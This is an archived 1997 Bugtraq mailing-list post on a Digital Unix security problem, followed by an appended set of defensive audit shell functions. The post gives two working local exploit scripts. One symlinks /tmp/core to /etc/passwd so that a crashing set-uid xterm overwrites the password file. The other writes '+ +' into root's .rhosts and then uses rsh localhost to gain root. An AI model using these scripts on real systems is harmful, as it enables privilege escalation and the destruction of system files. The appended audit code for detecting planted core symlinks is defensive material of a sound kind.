Bugtraq mailing list archives

Re: Digital Unix Security Problem


From: codewarrior () daemon org (Andrew Brown)
Date: Thu, 13 Nov 1997 11:32:23 -0500


       Even with a buffer overflow, I've never seen anyone exploit on one
DU. If anyone has done so successfully, please email me.  Despite that, a
person with basic knowledge of unix could easily do something like:

#!/bin/csh
cd /tmp
ln -s /etc/passwd /tmp/core
setenv DISPLAY abcdefghi
/usr/bin/X11/xterm

       The contents of /etc/passwd becomes xterm's core, preventing
further logins.  Obviously you could do things without an immediate impact
such as ln -s /vmunix /tmp/core.

or...if the system you're on is actually running r-services, you could do

#!/bin/sh
DISPLAY="
+ +
"
export DISPLAY
cd /tmp
ln -s /.rhosts /tmp/core
/usr/bin/X11/xterm
rsh localhost

which sets the DISPLAY variable to an "admit all from all" line and
the core dump will go into root's .rhosts file.  Then all that remains
is the rsh localhost and you're all set!

considerably easier than a buffer overflow exploit...

--
|-----< "CODE WARRIOR" >-----|
andrew () echonyc com (TheMan)        * "ah!  i see you have the internet
codewarrior () daemon org                               that goes *ping*!"
warfare () graffiti com      * "information is power -- share the wealth."
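Added example, not part of the original post or the thread it replies to: both recipes above depend on a planted symbolic link named "core" in a world-writable directory and on the set-uid program being allowed to dump core at all. The POSIX sh functions below let an administrator audit a host for those two preconditions: the first lists every link named core (or core.*) in the scanned directories together with its target, the second reports whether core dumps are disabled for the current process limits. The directory list and the name pattern are assumptions for this example; find -maxdepth and readlink are common extensions rather than strict POSIX.

```shell
#!/bin/sh
# Added example (not from the original post): audit for planted "core"
# symlinks and check whether core dumps are disabled.

# Print "<link> -> <target>" for every symbolic link named core or core.*
# directly inside each directory given as an argument. Directories that do
# not exist are skipped. The default list below is an assumption.
find_core_symlinks() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -maxdepth 1 -type l \( -name core -o -name 'core.*' \) \
            -exec sh -c 'printf "%s -> %s\n" "$1" "$(readlink "$1")"' _ {} \;
    done
}

# Succeed (exit 0) when at least one core symlink exists in the given
# directories, so the caller can alert on it.
core_symlink_present() {
    [ -n "$(find_core_symlinks "$@")" ]
}

# Succeed when the soft core-file size limit is 0, i.e. no core file can be
# written by processes inheriting this limit, which removes the write the
# post relies on. ulimit -c is a shell builtin on sh, bash, ksh and dash.
core_dumps_disabled() {
    [ "$(ulimit -c)" = "0" ]
}

# Usage (assumed directory list):
#   find_core_symlinks /tmp /var/tmp
#   core_dumps_disabled || echo "core dumps enabled: set 'ulimit -c 0' in /etc/profile"
```

Running find_core_symlinks /tmp /var/tmp on the hosts you administer and scheduling it from cron gives early warning of the link step; core_dumps_disabled confirms the limit that should be in the system-wide login profile.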
